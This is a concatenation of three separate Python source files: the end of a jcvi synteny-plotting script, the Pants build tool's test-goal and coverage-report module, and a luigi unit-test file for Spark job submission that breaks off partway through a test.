                start, end = start.start, end.end  # start, end coordinates
                ef = list(extra_features.extract(chr, start, end))

                # Pruning removes minor features with < 0.1% of the region
                ef_pruned = [x for x in ef if x.span >= span / 1000]
                print(
                    "Extracted {0} features "
                    "({1} after pruning)".format(len(ef), len(ef_pruned)),
                    file=sys.stderr,
                )
                extras.append(ef_pruned)

        # The widest track defines the bp-per-axes-unit scale.
        maxspan = max(exts, key=lambda x: x[-1])[-1]
        scale = maxspan / CanvasSize

        self.gg = gg = {}
        self.rr = []
        ymids = []
        glyphcolor = (
            OrientationPalette()
            if glyphcolor == "orientation"
            else OrthoGroupPalette(bf.grouper())
        )
        for i in range(bf.ncols):
            ext = exts[i]
            ef = extras[i] if extras else None
            r = Region(
                root,
                ext,
                lo[i],
                bed,
                scale,
                switch,
                gene_labels=gene_labels,
                genelabelsize=genelabelsize,
                chr_label=chr_label,
                loc_label=loc_label,
                vpad=vpad,
                extra_features=ef,
                glyphstyle=glyphstyle,
                glyphcolor=glyphcolor,
            )
            self.rr.append(r)
            # Use tid and accn to store gene positions
            gg.update(dict(((i, k), v) for k, v in r.gg.items()))
            ymids.append(r.y)

        def offset(samearc):
            # Vertical offset for shades anchored on one track's arc.
            # NOTE(review): returns None for any other samearc value,
            # which would break the ymid arithmetic below -- presumably
            # only these four values ever appear; confirm.
            if samearc == "above":
                return 2 * pad
            if samearc == "above2":
                return 4 * pad
            if samearc == "below":
                return -2 * pad
            if samearc == "below2":
                return -4 * pad

        # Draw the syntenic wedges for every edge in the layout.
        for i, j, blockcolor, samearc in lo.edges:
            for ga, gb, h in bf.iter_pairs(i, j):
                a, b = gg[(i, ga)], gg[(j, gb)]
                if samearc is not None:
                    ymid = ymids[i] + offset(samearc)
                else:
                    ymid = (ymids[i] + ymids[j]) / 2
                Shade(root, a, b, ymid, fc=blockcolor, lw=0, alpha=1, style=shadestyle)

            # Second pass: highlighted pairs drawn on top.
            for ga, gb, h in bf.iter_pairs(i, j, highlight=True):
                a, b = gg[(i, ga)], gg[(j, gb)]
                if samearc is not None:
                    ymid = ymids[i] + offset(samearc)
                else:
                    ymid = (ymids[i] + ymids[j]) / 2
                Shade(
                    root, a, b, ymid, alpha=1, highlight=h, zorder=2, style=shadestyle
                )

        if scalebar:
            print("Build scalebar (scale={})".format(scale), file=sys.stderr)
            # Find the best length of the scalebar
            ar = [1, 2, 5]
            candidates = (
                [1000 * x for x in ar]
                + [10000 * x for x in ar]
                + [100000 * x for x in ar]
            )
            # Find the one that's close to an optimal canvas size
            dists = [(abs(x / scale - 0.12), x) for x in candidates]
            dist, candidate = min(dists)
            dist = candidate / scale

            x, y, yp = 0.22, 0.92, 0.005
            a, b = x - dist / 2, x + dist / 2
            lsg = "lightslategrey"
            root.plot([a, a], [y - yp, y + yp], "-", lw=2, color=lsg)
            root.plot([b, b], [y - yp, y + yp], "-", lw=2, color=lsg)
            root.plot([a, b], [y, y], "-", lw=2, color=lsg)
            root.text(
                x,
                y + 0.02,
                human_size(candidate, precision=0),
                ha="center",
                va="center",
            )

        if tree:
            # Optional phylogenetic trees drawn beneath the tracks.
            from jcvi.graphics.tree import draw_tree, read_trees

            trees = read_trees(tree)
            ntrees = len(trees)
            logging.debug("A total of {0} trees imported.".format(ntrees))
            xiv = 1.0 / ntrees
            yiv = 0.3
            xstart = 0
            ystart = min(ymids) - 0.4
            for i in range(ntrees):
                ax = fig.add_axes([xstart, ystart, xiv, yiv])
                label, outgroup, color, tx = trees[i]
                draw_tree(
                    ax,
                    tx,
                    outgroup=outgroup,
                    rmargin=0.4,
                    leaffont=11,
                    treecolor=color,
                    supportcolor=color,
                    leafcolor=color,
                )
                xstart += xiv
                RoundLabel(ax, 0.5, 0.3, label, fill=True, fc="lavender", color=color)
def draw_gene_legend(
    ax,
    x1,
    x2,
    ytop,
    d=0.04,
    text=False,
    repeat=False,
    glyphstyle="box",
):
    """Draw a small legend explaining gene orientation colors.

    Args:
        ax: matplotlib Axes to draw on
        x1 (float): x-position of the forward (+) gene sample
        x2 (float): x-position of the backward (-) gene sample
        ytop (float): y-position of the legend row
        d (float, optional): Length of each sample glyph. Defaults to 0.04.
        text (bool, optional): Add "gene (+)" / "gene (-)" captions. Defaults to False.
        repeat (bool, optional): Also draw a repeat-feature sample. Defaults to False.
        glyphstyle (str, optional): Style passed to Glyph for the repeat sample.
            Defaults to "box".
    """
    forward, backward = OrientationPalette.forward, OrientationPalette.backward
    ax.plot([x1, x1 + d], [ytop, ytop], ":", color=forward, lw=2)
    ax.plot([x1 + d], [ytop], ">", color=forward, mec=forward)
    ax.plot([x2, x2 + d], [ytop, ytop], ":", color=backward, lw=2)
    # Use the palette's backward color for the marker edge, mirroring the
    # forward arrow above (was hard-coded "g").
    ax.plot([x2], [ytop], "<", color=backward, mec=backward)
    if text:
        ax.text(x1 + d / 2, ytop + d / 2, "gene (+)", ha="center")
        ax.text(x2 + d / 2, ytop + d / 2, "gene (-)", ha="center")
    if repeat:
        # Repeat sample glyph centered between the two gene samples.
        xr = (x1 + x2 + d) / 2
        Glyph(
            ax,
            xr - d / 2,
            xr + d / 2,
            ytop,
            0.012 * 3 / 4,
            gradient=False,
            fc="#ff7f00",
            style=glyphstyle,
            zorder=2,
        )
        ax.text(xr, ytop + d / 2, "repeat", ha="center")
def main():
    """Parse command-line options and render the macro-synteny figure.

    Expects three positional arguments: the synteny data file, the BED file,
    and the layout file. Writes the figure to `<datafile-prefix>.<format>`.
    """
    p = OptionParser(__doc__)
    p.add_option("--switch", help="Rename the seqid with two-column file")
    p.add_option("--tree", help="Display trees on the bottom of the figure")
    p.add_option("--extra", help="Extra features in BED format")
    p.add_option(
        "--genelabels",
        help='Show only these gene labels, separated by comma. Example: "At1g12340,At5g54690"',
    )
    p.add_option(
        "--genelabelsize",
        default=0,
        type="int",
        help="Show gene labels at this font size, useful for debugging. "
        + "However, plot may appear visually crowded. "
        + "Reasonably good values are 2 to 6 [Default: disabled]",
    )
    p.add_option(
        "--scalebar",
        default=False,
        action="store_true",
        help="Add scale bar to the plot",
    )
    p.add_option(
        "--glyphstyle",
        default="box",
        choices=Glyph.Styles,
        help="Style of feature glyphs",
    )
    p.add_option(
        "--glyphcolor",
        default="orientation",
        choices=Glyph.Palette,
        help="Glyph coloring based on",
    )
    p.add_option(
        "--shadestyle",
        default="curve",
        choices=Shade.Styles,
        help="Style of syntenic wedges",
    )
    opts, args, iopts = p.set_image_options(figsize="8x7")
    if len(args) != 3:
        sys.exit(not p.print_help())
    datafile, bedfile, layoutfile = args
    switch = opts.switch
    tree = opts.tree
    # --genelabels is a comma-separated whitelist; None means "label everything".
    gene_labels = None if not opts.genelabels else set(opts.genelabels.split(","))
    # Output prefix: the data filename without its last extension.
    pf = datafile.rsplit(".", 1)[0]
    fig = plt.figure(1, (iopts.w, iopts.h))
    # Full-canvas axes; Synteny draws everything in normalized [0, 1] coordinates.
    root = fig.add_axes([0, 0, 1, 1])
    Synteny(
        fig,
        root,
        datafile,
        bedfile,
        layoutfile,
        switch=switch,
        tree=tree,
        extra_features=opts.extra,
        gene_labels=gene_labels,
        genelabelsize=opts.genelabelsize,
        scalebar=opts.scalebar,
        shadestyle=opts.shadestyle,
        glyphstyle=opts.glyphstyle,
        glyphcolor=opts.glyphcolor,
    )
    root.set_xlim(0, 1)
    root.set_ylim(0, 1)
    root.set_axis_off()
    image_name = pf + "." + iopts.format
    savefig(image_name, dpi=iopts.dpi, iopts=iopts)
if __name__ == "__main__":
    main()
| |
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import itertools
import logging
from abc import ABC, ABCMeta
from dataclasses import dataclass
from enum import Enum
from pathlib import PurePath
from typing import Any, ClassVar, TypeVar, cast
from pants.core.goals.package import BuiltPackage, PackageFieldSet
from pants.core.util_rules.distdir import DistDir
from pants.engine.addresses import Address, UnparsedAddressInputs
from pants.engine.collection import Collection
from pants.engine.console import Console
from pants.engine.desktop import OpenFiles, OpenFilesRequest
from pants.engine.engine_aware import EngineAwareReturnType
from pants.engine.environment import Environment, EnvironmentRequest
from pants.engine.fs import EMPTY_FILE_DIGEST, Digest, FileDigest, MergeDigests, Snapshot, Workspace
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.session import RunId
from pants.engine.process import (
FallibleProcessResult,
InteractiveProcess,
InteractiveProcessResult,
ProcessResultMetadata,
)
from pants.engine.rules import Effect, Get, MultiGet, collect_rules, goal_rule, rule
from pants.engine.target import (
FieldSet,
FieldSetsPerTarget,
FieldSetsPerTargetRequest,
NoApplicableTargetsBehavior,
SourcesField,
SpecialCasedDependencies,
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest,
Targets,
)
from pants.engine.unions import UnionMembership, union
from pants.option.option_types import BoolOption, EnumOption, StrListOption, StrOption
from pants.util.docutil import bin_name
from pants.util.logging import LogLevel
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class TestResult(EngineAwareReturnType):
    """The outcome of running (or skipping) the tests for a single target."""
    # None indicates that the test was skipped; see `skip()` and `skipped`.
    exit_code: int | None
    stdout: str
    stdout_digest: FileDigest
    stderr: str
    stderr_digest: FileDigest
    address: Address
    output_setting: ShowOutput
    result_metadata: ProcessResultMetadata | None
    coverage_data: CoverageData | None = None
    xml_results: Snapshot | None = None
    # Any extra output (such as from plugins) that the test runner was configured to output.
    extra_output: Snapshot | None = None
    # Prevent this class from being detected by pytest as a test class.
    __test__ = False
    @classmethod
    def skip(cls, address: Address, output_setting: ShowOutput) -> TestResult:
        """Create a result representing a skipped test: no process was run."""
        return cls(
            exit_code=None,
            stdout="",
            stderr="",
            stdout_digest=EMPTY_FILE_DIGEST,
            stderr_digest=EMPTY_FILE_DIGEST,
            address=address,
            output_setting=output_setting,
            result_metadata=None,
        )
    @classmethod
    def from_fallible_process_result(
        cls,
        process_result: FallibleProcessResult,
        address: Address,
        output_setting: ShowOutput,
        *,
        coverage_data: CoverageData | None = None,
        xml_results: Snapshot | None = None,
        extra_output: Snapshot | None = None,
    ) -> TestResult:
        """Build a result from the (possibly failing) test process execution."""
        return cls(
            exit_code=process_result.exit_code,
            stdout=process_result.stdout.decode(),
            stdout_digest=process_result.stdout_digest,
            stderr=process_result.stderr.decode(),
            stderr_digest=process_result.stderr_digest,
            address=address,
            output_setting=output_setting,
            result_metadata=process_result.metadata,
            coverage_data=coverage_data,
            xml_results=xml_results,
            extra_output=extra_output,
        )
    @property
    def skipped(self) -> bool:
        """True if no test process was actually run for this target."""
        return self.exit_code is None or self.result_metadata is None
    def __lt__(self, other: Any) -> bool:
        """We sort first by status (skipped vs failed vs succeeded), then alphanumerically within
        each group."""
        if not isinstance(other, TestResult):
            return NotImplemented
        if self.exit_code == other.exit_code:
            return self.address.spec < other.address.spec
        # Skipped results (exit_code None) sort first.
        if self.skipped or self.exit_code is None:
            return True
        if other.skipped or other.exit_code is None:
            return False
        return abs(self.exit_code) < abs(other.exit_code)
    def artifacts(self) -> dict[str, FileDigest | Snapshot] | None:
        """Outputs surfaced to the engine alongside this result."""
        output: dict[str, FileDigest | Snapshot] = {
            "stdout": self.stdout_digest,
            "stderr": self.stderr_digest,
        }
        if self.xml_results:
            output["xml_results"] = self.xml_results
        return output
    def level(self) -> LogLevel:
        """Log level used when the engine renders this result."""
        if self.skipped:
            return LogLevel.DEBUG
        return LogLevel.INFO if self.exit_code == 0 else LogLevel.ERROR
    def message(self) -> str:
        """Human-readable status line, optionally followed by the captured output."""
        if self.skipped:
            return f"{self.address} skipped."
        status = "succeeded" if self.exit_code == 0 else f"failed (exit code {self.exit_code})"
        message = f"{self.address} {status}."
        # Honor the --output setting: suppress output entirely, or for successes.
        if self.output_setting == ShowOutput.NONE or (
            self.output_setting == ShowOutput.FAILED and self.exit_code == 0
        ):
            return message
        output = ""
        if self.stdout:
            output += f"\n{self.stdout}"
        if self.stderr:
            output += f"\n{self.stderr}"
        if output:
            output = f"{output.rstrip()}\n\n"
        return f"{message}{output}"
    def metadata(self) -> dict[str, Any]:
        return {"address": self.address.spec}
    def cacheable(self) -> bool:
        """Is marked uncacheable to ensure that it always renders."""
        return False
class ShowOutput(Enum):
    """Which tests to emit detailed output for."""
    ALL = "all"  # show stdout/stderr for every test
    FAILED = "failed"  # show stdout/stderr only for failing tests
    NONE = "none"  # never show stdout/stderr
@dataclass(frozen=True)
class TestDebugRequest:
    """An interactive process to run a test in `--debug` mode."""
    # None means the test was skipped and no interactive process should run.
    process: InteractiveProcess | None
    # Prevent this class from being detected by pytest as a test class.
    __test__ = False
@union
@dataclass(frozen=True)
class TestFieldSet(FieldSet, metaclass=ABCMeta):
    """The fields necessary to run tests on a target."""
    sources: SourcesField
    # Prevent this class from being detected by pytest as a test class.
    __test__ = False
# Marker base class with no abstract methods: subclasses are dispatched via unions.
class CoverageData(ABC):
    """Base class for inputs to a coverage report.
    Subclasses should add whichever fields they require - snapshots of coverage output, XML files,
    etc.
    """
# Type variable binding a CoverageDataCollection to its element type.
_CD = TypeVar("_CD", bound=CoverageData)
@union
class CoverageDataCollection(Collection[_CD]):
    """A homogeneous collection of CoverageData, grouped by concrete type."""
    element_type: ClassVar[type[_CD]]
@dataclass(frozen=True)
class CoverageReport(ABC):
    """Represents a code coverage report that can be materialized to the terminal or disk."""
    # Some coverage systems can determine, based on a configurable threshold, whether coverage
    # was sufficient or not. The test goal will fail the build if coverage was deemed insufficient.
    coverage_insufficient: bool
    def materialize(self, console: Console, workspace: Workspace) -> PurePath | None:
        """Materialize this code coverage report to the terminal or disk.
        :param console: A handle to the terminal.
        :param workspace: A handle to local disk.
        :return: If a report was materialized to disk, the path of the file in the report one might
        open first to start examining the report.
        """
        ...
    def get_artifact(self) -> tuple[str, Snapshot] | None:
        # By default a report exposes no (name, snapshot) artifact.
        return None
@dataclass(frozen=True)
class ConsoleCoverageReport(CoverageReport):
    """Materializes a code coverage report to the terminal."""
    # Pre-rendered report text, printed verbatim to stderr.
    report: str
    def materialize(self, console: Console, workspace: Workspace) -> None:
        """Print the report; returns None because nothing is written to disk."""
        console.print_stderr(f"\n{self.report}")
        return None
@dataclass(frozen=True)
class FilesystemCoverageReport(CoverageReport):
    """Materializes a code coverage report to disk."""
    # Snapshot of the report files to write out.
    result_snapshot: Snapshot
    # Directory under which the snapshot is written.
    directory_to_materialize_to: PurePath
    # Entry-point file of the report (e.g. index.html), if any.
    report_file: PurePath | None
    # Short identifier such as "xml" or "html"; also used in the artifact name.
    report_type: str
    def materialize(self, console: Console, workspace: Workspace) -> PurePath | None:
        """Write the report files to disk and return the report's entry-point path."""
        workspace.write_digest(
            self.result_snapshot.digest, path_prefix=str(self.directory_to_materialize_to)
        )
        console.print_stderr(
            f"\nWrote {self.report_type} coverage report to `{self.directory_to_materialize_to}`"
        )
        return self.report_file
    def get_artifact(self) -> tuple[str, Snapshot] | None:
        return f"coverage_{self.report_type}", self.result_snapshot
@dataclass(frozen=True)
class CoverageReports(EngineAwareReturnType):
    """All coverage reports produced by one coverage backend."""
    reports: tuple[CoverageReport, ...]
    @property
    def coverage_insufficient(self) -> bool:
        """Whether to fail the build due to insufficient coverage."""
        return any(report.coverage_insufficient for report in self.reports)
    def materialize(self, console: Console, workspace: Workspace) -> tuple[PurePath, ...]:
        """Materialize every report; return the paths of those written to disk."""
        report_paths = []
        for report in self.reports:
            report_path = report.materialize(console, workspace)
            if report_path:
                report_paths.append(report_path)
        return tuple(report_paths)
    def artifacts(self) -> dict[str, Snapshot | FileDigest] | None:
        """Collect each report's artifact, or None if no report provides one."""
        artifacts: dict[str, Snapshot | FileDigest] = {}
        for report in self.reports:
            artifact = report.get_artifact()
            if not artifact:
                continue
            artifacts[artifact[0]] = artifact[1]
        return artifacts or None
class TestSubsystem(GoalSubsystem):
    """Options for the `test` goal."""
    name = "test"
    help = "Run tests."
    # Prevent this class from being detected by pytest as a test class.
    __test__ = False
    @classmethod
    def activated(cls, union_membership: UnionMembership) -> bool:
        # The goal is only available when at least one backend registers a TestFieldSet.
        return TestFieldSet in union_membership
    debug = BoolOption(
        "--debug",
        default=False,
        help=(
            "Run tests sequentially in an interactive process. This is necessary, for "
            "example, when you add breakpoints to your code."
        ),
    )
    force = BoolOption(
        "--force",
        default=False,
        help="Force the tests to run, even if they could be satisfied from cache.",
    )
    output = EnumOption(
        "--output",
        default=ShowOutput.FAILED,
        help="Show stdout/stderr for these tests.",
    )
    use_coverage = BoolOption(
        "--use-coverage",
        default=False,
        help="Generate a coverage report if the test runner supports it.",
    )
    open_coverage = BoolOption(
        "--open-coverage",
        default=False,
        help=(
            "If a coverage report file is generated, open it on the local system if the "
            "system supports this."
        ),
    )
    xml_dir = StrOption(
        "--xml-dir",
        metavar="<DIR>",
        default=None,
        advanced=True,
        help=(
            "Specifying a directory causes Junit XML result files to be emitted under "
            "that dir for each test run that supports producing them."
        ),
    )
    extra_env_vars = StrListOption(
        "--extra-env-vars",
        help=(
            "Additional environment variables to include in test processes. "
            "Entries are strings in the form `ENV_VAR=value` to use explicitly; or just "
            "`ENV_VAR` to copy the value of a variable in Pants's own environment."
        ),
    )
class Test(Goal):
    """The `test` goal; its exit code is the overall run's exit code."""
    subsystem_cls = TestSubsystem
    # Prevent this class from being detected by pytest as a test class.
    __test__ = False
@goal_rule
async def run_tests(
    console: Console,
    test_subsystem: TestSubsystem,
    workspace: Workspace,
    union_membership: UnionMembership,
    dist_dir: DistDir,
    run_id: RunId,
) -> Test:
    """Run all applicable tests and report results, XML output and coverage.

    In `--debug` mode, tests run sequentially in interactive processes; otherwise
    they run (and cache) in parallel, with a summary printed at the end.
    """
    if test_subsystem.debug:
        targets_to_valid_field_sets = await Get(
            TargetRootsToFieldSets,
            TargetRootsToFieldSetsRequest(
                TestFieldSet,
                goal_description="`test --debug`",
                no_applicable_targets_behavior=NoApplicableTargetsBehavior.error,
            ),
        )
        debug_requests = await MultiGet(
            Get(TestDebugRequest, TestFieldSet, field_set)
            for field_set in targets_to_valid_field_sets.field_sets
        )
        exit_code = 0
        for debug_request, field_set in zip(debug_requests, targets_to_valid_field_sets.field_sets):
            if debug_request.process is None:
                logger.debug(f"Skipping tests for {field_set.address}")
                continue
            debug_result = await Effect(
                InteractiveProcessResult, InteractiveProcess, debug_request.process
            )
            # Remember the last non-zero exit code so any failure fails the goal.
            if debug_result.exit_code != 0:
                exit_code = debug_result.exit_code
        return Test(exit_code)
    targets_to_valid_field_sets = await Get(
        TargetRootsToFieldSets,
        TargetRootsToFieldSetsRequest(
            TestFieldSet,
            goal_description=f"the `{test_subsystem.name}` goal",
            no_applicable_targets_behavior=NoApplicableTargetsBehavior.warn,
        ),
    )
    results = await MultiGet(
        Get(TestResult, TestFieldSet, field_set)
        for field_set in targets_to_valid_field_sets.field_sets
    )
    # Print summary.
    exit_code = 0
    if results:
        console.print_stderr("")
    for result in sorted(results):
        if result.skipped:
            continue
        if result.exit_code != 0:
            exit_code = cast(int, result.exit_code)
        console.print_stderr(_format_test_summary(result, run_id, console))
        if result.extra_output and result.extra_output.files:
            workspace.write_digest(
                result.extra_output.digest,
                path_prefix=str(dist_dir.relpath / "test" / result.address.path_safe_spec),
            )
    # NB: Use the declarative option property (as with `debug`/`use_coverage` above)
    # instead of the legacy `test_subsystem.options.xml_dir` access.
    if test_subsystem.xml_dir:
        xml_dir = test_subsystem.xml_dir
        merged_xml_results = await Get(
            Digest,
            MergeDigests(result.xml_results.digest for result in results if result.xml_results),
        )
        workspace.write_digest(merged_xml_results, path_prefix=xml_dir)
        console.print_stderr(f"\nWrote test XML to `{xml_dir}`")
    if test_subsystem.use_coverage:
        # NB: We must pre-sort the data for itertools.groupby() to work properly, using the same
        # key function for both. However, you can't sort by `types`, so we call `str()` on it.
        all_coverage_data = sorted(
            (result.coverage_data for result in results if result.coverage_data is not None),
            key=lambda cov_data: str(type(cov_data)),
        )
        coverage_types_to_collection_types = {
            collection_cls.element_type: collection_cls  # type: ignore[misc]
            for collection_cls in union_membership.get(CoverageDataCollection)
        }
        coverage_collections = []
        for data_cls, data in itertools.groupby(all_coverage_data, lambda data: type(data)):
            collection_cls = coverage_types_to_collection_types[data_cls]
            coverage_collections.append(collection_cls(data))
        # We can create multiple reports for each coverage data (e.g., console, xml, html)
        coverage_reports_collections = await MultiGet(
            Get(CoverageReports, CoverageDataCollection, coverage_collection)
            for coverage_collection in coverage_collections
        )
        coverage_report_files: list[PurePath] = []
        for coverage_reports in coverage_reports_collections:
            report_files = coverage_reports.materialize(console, workspace)
            coverage_report_files.extend(report_files)
        if coverage_report_files and test_subsystem.open_coverage:
            open_files = await Get(
                OpenFiles, OpenFilesRequest(coverage_report_files, error_if_open_not_found=False)
            )
            for process in open_files.processes:
                _ = await Effect(InteractiveProcessResult, InteractiveProcess, process)
        for coverage_reports in coverage_reports_collections:
            if coverage_reports.coverage_insufficient:
                logger.error(
                    "Test goal failed due to insufficient coverage. "
                    "See coverage reports for details."
                )
                # coverage.py uses 2 to indicate failure due to insufficient coverage.
                # We may as well follow suit in the general case, for all languages.
                exit_code = 2
    return Test(exit_code)
# Human-readable descriptions of where a test process result came from,
# shown in the per-test summary line (e.g. "(cached locally)").
_SOURCE_MAP = {
    ProcessResultMetadata.Source.MEMOIZED: "memoized",
    ProcessResultMetadata.Source.RAN_REMOTELY: "ran remotely",
    ProcessResultMetadata.Source.HIT_LOCALLY: "cached locally",
    ProcessResultMetadata.Source.HIT_REMOTELY: "cached remotely",
}
def _format_test_summary(result: TestResult, run_id: RunId, console: Console) -> str:
    """Build the sigil-prefixed, one-line summary shown for a single test result."""
    assert (
        result.result_metadata is not None
    ), "Skipped test results should not be outputted in the test summary"
    if result.exit_code == 0:
        sigil, status = console.sigil_succeeded(), "succeeded"
    else:
        sigil, status = console.sigil_failed(), "failed"
    # Optional annotations: elapsed time, then the result's cache/remote source.
    elapsed_part = ""
    elapsed_ms = result.result_metadata.total_elapsed_ms
    if elapsed_ms is not None:
        elapsed_part = f"in {elapsed_ms / 1000:.2f}s"
    source_desc = _SOURCE_MAP.get(result.result_metadata.source(run_id))
    source_part = f" ({source_desc})" if source_desc else ""
    return f"{sigil} {result.address} {status} {elapsed_part}{source_part}."
@dataclass(frozen=True)
class TestExtraEnv:
    """Environment variables resolved from `[test].extra_env_vars`."""
    env: Environment
@rule
async def get_filtered_environment(test_subsystem: TestSubsystem) -> TestExtraEnv:
    """Resolve the `--extra-env-vars` option into a concrete environment."""
    return TestExtraEnv(await Get(Environment, EnvironmentRequest(test_subsystem.extra_env_vars)))
# -------------------------------------------------------------------------------------------
# `runtime_package_dependencies` field
# -------------------------------------------------------------------------------------------
class RuntimePackageDependenciesField(SpecialCasedDependencies):
    """The `runtime_package_dependencies` field: packages built into the test chroot."""
    alias = "runtime_package_dependencies"
    help = (
        f"Addresses to targets that can be built with the `{bin_name()} package` goal and whose "
        "resulting artifacts should be included in the test run.\n\nPants will build the artifacts "
        f"as if you had run `{bin_name()} package`. It will include the results in your test's chroot, "
        "using the same name they would normally have, but without the `--distdir` prefix (e.g. "
        f"`dist/`).\n\nYou can include anything that can be built by `{bin_name()} package`, e.g. a "
        "`pex_binary`, `python_awslambda`, or an `archive`."
    )
class BuiltPackageDependencies(Collection[BuiltPackage]):
    """The built artifacts of a target's `runtime_package_dependencies`."""
    pass
@dataclass(frozen=True)
class BuildPackageDependenciesRequest:
    """Request to build the packages referenced by a `runtime_package_dependencies` field."""
    field: RuntimePackageDependenciesField
@rule(desc="Build runtime package dependencies for tests", level=LogLevel.DEBUG)
async def build_runtime_package_dependencies(
    request: BuildPackageDependenciesRequest,
) -> BuiltPackageDependencies:
    """Build every package referenced by a target's `runtime_package_dependencies`."""
    unparsed_addresses = request.field.to_unparsed_address_inputs()
    # Nothing to build if the field is unset/empty.
    if not unparsed_addresses:
        return BuiltPackageDependencies()
    tgts = await Get(Targets, UnparsedAddressInputs, unparsed_addresses)
    field_sets_per_tgt = await Get(
        FieldSetsPerTarget, FieldSetsPerTargetRequest(PackageFieldSet, tgts)
    )
    packages = await MultiGet(
        Get(BuiltPackage, PackageFieldSet, field_set) for field_set in field_sets_per_tgt.field_sets
    )
    return BuiltPackageDependencies(packages)
def rules():
    """Expose this module's rules to the engine."""
    return list(collect_rules())
| |
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest
import os
import luigi
import luigi.contrib.hdfs
from luigi import six
from luigi.mock import MockTarget
from helpers import with_config
from luigi.contrib.spark import SparkJobError, SparkSubmitTask, PySparkTask, PySpark1xJob, Spark1xJob, SparkJob
from mock import patch, MagicMock
BytesIO = six.BytesIO
def poll_generator():
    """Simulate Popen.poll(): still running (None) once, then finished (1)."""
    yield from (None, 1)
def setup_run_process(proc):
    """Configure a mocked subprocess.Popen to simulate one successful run."""
    polls = poll_generator()
    mock_proc = proc.return_value
    # poll() reports "still running" once, then a finished status.
    mock_proc.poll = lambda: next(polls)
    mock_proc.returncode = 0
    mock_proc.stdout = BytesIO()
    mock_proc.stderr = BytesIO()
class TestSparkSubmitTask(SparkSubmitTask):
    """Fixture task exercising every SparkSubmitTask configuration attribute."""
    deploy_mode = "client"
    name = "AppName"
    entry_class = "org.test.MyClass"
    jars = ["jars/my.jar"]
    py_files = ["file1.py", "file2.py"]
    files = ["file1", "file2"]
    conf = {"Prop": "Value"}
    properties_file = "conf/spark-defaults.conf"
    driver_memory = "4G"
    driver_java_options = "-Xopt"
    driver_library_path = "library/path"
    driver_class_path = "class/path"
    executor_memory = "8G"
    driver_cores = 8
    supervise = True
    total_executor_cores = 150
    executor_cores = 10
    queue = "queue"
    num_executors = 2
    archives = ["archive1", "archive2"]
    app = "file"
    def app_options(self):
        # Positional application arguments appended after the app itself.
        return ["arg1", "arg2"]
    def output(self):
        return luigi.LocalTarget('output')
class TestDefaultSparkSubmitTask(SparkSubmitTask):
    """Fixture task relying purely on configuration-file defaults."""
    app = 'test.py'
    def output(self):
        return luigi.LocalTarget('output')
class TestPySparkTask(PySparkTask):
    """Fixture PySpark task that copies its input target to its output target."""
    def input(self):
        return MockTarget('input')
    def output(self):
        return MockTarget('output')
    def main(self, sc, *args):
        sc.textFile(self.input().path).saveAsTextFile(self.output().path)
class HdfsJob(luigi.ExternalTask):
    """External dependency represented by a pre-existing HDFS target."""
    def output(self):
        return luigi.contrib.hdfs.HdfsTarget('test')
class TestSparkJob(SparkJob):
    """Fixture Spark-on-YARN job with fixed cluster sizing."""
    spark_workers = '2'
    spark_master_memory = '1g'
    spark_worker_memory = '1g'
    def requires_hadoop(self):
        return HdfsJob()
    def jar(self):
        return 'jar'
    def job_class(self):
        return 'job_class'
    def output(self):
        return luigi.LocalTarget('output')
class TestSpark1xJob(Spark1xJob):
    """Fixture Spark 1.x JVM job with stub jar and entry class."""
    def jar(self):
        return 'jar'
    def job_class(self):
        return 'job_class'
    def output(self):
        return luigi.LocalTarget('output')
class TestPySpark1xJob(PySpark1xJob):
    """Fixture Spark 1.x Python job with a stub program path."""
    def program(self):
        return 'python_file'
    def output(self):
        return luigi.LocalTarget('output')
class SparkSubmitTaskTest(unittest.TestCase):
    """Tests for SparkSubmitTask command-line construction and error handling."""
    ss = 'ss-stub'
    @with_config({'spark': {'spark-submit': ss, 'master': "yarn-client", 'hadoop-conf-dir': 'path'}})
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_run(self, proc):
        # Every configured task attribute should surface as a spark-submit flag.
        setup_run_process(proc)
        job = TestSparkSubmitTask()
        job.run()
        self.assertEqual(proc.call_args[0][0],
                         ['ss-stub', '--master', 'yarn-client', '--deploy-mode', 'client', '--name', 'AppName',
                          '--class', 'org.test.MyClass', '--jars', 'jars/my.jar', '--py-files', 'file1.py,file2.py',
                          '--files', 'file1,file2', '--archives', 'archive1,archive2', '--conf', 'Prop=Value',
                          '--properties-file', 'conf/spark-defaults.conf', '--driver-memory', '4G', '--driver-java-options', '-Xopt',
                          '--driver-library-path', 'library/path', '--driver-class-path', 'class/path', '--executor-memory', '8G',
                          '--driver-cores', '8', '--supervise', '--total-executor-cores', '150', '--executor-cores', '10',
                          '--queue', 'queue', '--num-executors', '2', 'file', 'arg1', 'arg2'])
    @with_config({'spark': {'spark-submit': ss, 'master': 'spark://host:7077', 'conf': 'prop1=val1', 'jars': 'jar1.jar,jar2.jar',
                            'files': 'file1,file2', 'py-files': 'file1.py,file2.py', 'archives': 'archive1'}})
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_defaults(self, proc):
        # Values from the luigi config section should fill in unset task attributes.
        proc.return_value.returncode = 0
        job = TestDefaultSparkSubmitTask()
        job.run()
        self.assertEqual(proc.call_args[0][0],
                         ['ss-stub', '--master', 'spark://host:7077', '--jars', 'jar1.jar,jar2.jar',
                          '--py-files', 'file1.py,file2.py', '--files', 'file1,file2', '--archives', 'archive1',
                          '--conf', 'prop1=val1', 'test.py'])
    @patch('luigi.contrib.spark.tempfile.TemporaryFile')
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_handle_failed_job(self, proc, file):
        # A non-zero return code should raise SparkJobError carrying stderr.
        proc.return_value.returncode = 1
        file.return_value = BytesIO(b'stderr')
        try:
            job = TestSparkSubmitTask()
            job.run()
        except SparkJobError as e:
            self.assertEqual(e.err, 'stderr')
            self.assertTrue('STDERR: stderr' in six.text_type(e))
        else:
